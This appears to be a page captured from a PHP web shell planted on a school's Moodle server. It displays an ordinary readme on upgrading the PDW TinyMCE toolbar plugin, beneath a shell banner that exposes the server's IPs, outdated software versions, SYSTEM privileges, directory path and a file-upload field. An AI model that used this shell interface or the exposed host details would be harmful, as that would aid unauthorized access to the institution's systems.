| Server IP : 172.67.187.206 / Your IP : 172.71.28.155 Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 User : SYSTEM ( 0) PHP Version : 5.6.30 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /Inetpub/www/myschool/triamudom/tuprblearn/lib/editor/tinymce/plugins/pdw/ |
Upload File : |
Description of PDW Toolbar Toggle integration in Moodle ========================================================================================= Copyright: Guido Neele (www.neele.name) License: MIT Moodle maintainer: Jason Fowler (phalacee) ========================================================================================= Upgrade procedure: 1/ extract standard PDW package into lib/editor/tinymce/plugins/pdw/tinymce/ 2/ bump up version.php 3/ update ./thirdpartylibs.xml 4/ reimplement patch in MDL-23646 5/ reimplement patch in MDL-40668 6/ add in "DOM.setStyle(ifr, 'width',DOM.getSize(ifrcon).w); // Resize iframe" (without quotes) after "DOM.setStyle(ifr, 'height',DOM.getSize(ifr).h + dy); // Resize iframe" 7/ reimplement patch in MDL-42481 8/ reimplement patch in MDL-42684 9/ reimplement patch in MDL-42887